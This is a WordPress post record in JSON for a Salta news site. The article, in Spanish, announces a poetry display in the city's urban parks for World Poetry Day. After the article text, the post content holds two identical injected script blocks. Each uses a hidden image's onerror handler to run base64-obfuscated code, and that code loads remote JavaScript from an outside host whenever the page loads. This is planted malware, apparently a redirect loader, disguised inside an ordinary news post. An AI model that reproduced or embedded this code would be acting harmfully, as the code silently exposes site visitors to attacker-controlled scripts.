{"id":3876,"date":"2024-03-20T12:26:40","date_gmt":"2024-03-20T15:26:40","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3876"},"modified":"2025-08-13T23:58:07","modified_gmt":"2025-08-14T02:58:07","slug":"tendedero-de-poesia-en-los-parques-urbanos","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3876","title":{"rendered":"Tendedero de poes\u00eda en los Parques Urbanos"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-2c4a624512dc47e8aa6ad093534d3983\" style=\"background-color:#890929\"><em>Ma\u00f1ana 21 de marzo en los Parques Urbanos la comunidad podr\u00e1 disfrutar de poemas que estar\u00e1n colgados en distintos lugares de los parques de la Familia, Sur, del Bicentenario y Camping el Pr\u00e9stamo<\/em><\/h4>\n\n\n\n<p>Con motivo de celebrarse el 21 de marzo el D\u00eda Mundial de la Poes\u00eda, en los parques de la Familia, del Bicentenario, Camping el Pr\u00e9stamo y Sur se realizar\u00e1 un tendedero con poemas de diversos autores.<\/p>\n\n\n\n<p>La convocatoria a participar en un \u201cescenario ef\u00edmero donde las palabras bailan al ritmo del viento y del sol, llenando el aire de emociones y sue\u00f1os\u201d; invita a la comunidad de un d\u00eda junto a la belleza.<\/p>\n\n\n\n<p>En el parque de la Familia los poemas estar\u00e1n distribuidos en todas las plazas con especial \u00e9nfasis en la Cultural, en tanto, en el Sur, Camping el Pr\u00e9stamo y en el Bicentenario los poemas se encontrar\u00e1n en el ingreso.<\/p>\n\n\n\n<p><strong>D\u00eda Mundial de la Poes\u00eda<\/strong><\/p>\n\n\n\n<p>La UNESCO adopt\u00f3 por primera vez el 21 de marzo como D\u00eda Mundial de la Poes\u00eda durante su 30\u00aa Conferencia General en Par\u00eds en 1999, con el objetivo de apoyar la diversidad ling\u00fc\u00edstica a trav\u00e9s de la expresi\u00f3n po\u00e9tica y fomentar la visibilizaci\u00f3n de aquellas lenguas que se encuentran en peligro.<\/p>\n\n\n\n<p>El D\u00eda Mundial de la Poes\u00eda es una ocasi\u00f3n para honrar a los poetas, revivir tradiciones orales de recitales de poes\u00eda, promover la lectura, la escritura y la ense\u00f1anza de la poes\u00eda, fomentar la convergencia entre la poes\u00eda y otras artes como el teatro, la danza, la m\u00fasica y la pintura, y aumentar la visibilidad de poes\u00eda en los medios.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/tendedero-de-poesia-en-los-parques-urbanos-94702\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretaria de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Ma\u00f1ana 21 de marzo en los Parques Urbanos la comunidad podr\u00e1 disfrutar de poemas que estar\u00e1n colgados en distintos lugares de los parques de la Familia, Sur, del Bicentenario y Camping el Pr\u00e9stamo Con motivo de celebrarse el 21 de marzo el D\u00eda Mundial de la Poes\u00eda, en los parques de la Familia, del Bicentenario, [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3877,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[17],"tags":[],"class_list":{"0":"post-3876","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-sociales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3876"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3876"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3876\/revisions"}],"predecessor-version":[{"id":6817,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3876\/revisions\/6817"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3877"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3876"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3876"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3876"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}